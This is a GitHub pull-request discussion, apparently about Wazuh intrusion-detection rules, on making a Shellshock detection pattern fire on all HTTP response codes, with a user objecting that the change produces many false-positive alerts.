New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Make Shellshock pattern more generic. Detect ShellShock attacks on all HTTP status code responses. #479
Conversation
In 17972c6 i have also updated the expected status code as a page might also redirect all requests to e.g. a login page or similar. This is covered already by rule 31108 so only the comment had to be updated. |
Updated comment accordingly.
6b28982 updated the rules to detect the ShellShock attacks on 50x status codes (e.g. 503 Service Unavailable) as well. A service might be currently unavailable (e.g. maintenance works) and alert should be thrown in this case. |
I'm also wondering if we shouldn't just use Edit: Did this in 7b7e0ca |
Hello @iasdeoupxe Thank you so much for your contribution. Regards, |
@Lopuiz Any updates on a review? Three months for such a minor change is a quite long time frame 😢 |
Hi @iasdeoupxe, Sorry for the late reviews of your contributions. They are really appreciated as always. We always try to attend the opened issues and pull requests from the users as soon as possible, but, unfortunately our resources are limited. We are working hard to decrease our response timeframe as well. I hope you understand it, and thank you again. Don't hesitate to ping us whether this situation happens again. Best regards, |
Is this really necessary? Seeing a shellshock attempt log event says nothing about whether it was successful. I have Wazuh running on public-facing servers, and naturally there are several attempts by bots every day, and the email notifications are now going crazy. In my case, the response codes seem to be 301s (which a commit here added recently). I realize that I can turn this off iln my instance, but I am wondering if an exploit attempt should really be worthy of a level 15 alert when there is no indication of success. Else, it's going to create a lot of false positives on production machines. |
Hello @k3an3 We are solving it. Best regards, |
The text pattern could be everything like e.g.:
or:
This change should catch more of these variants.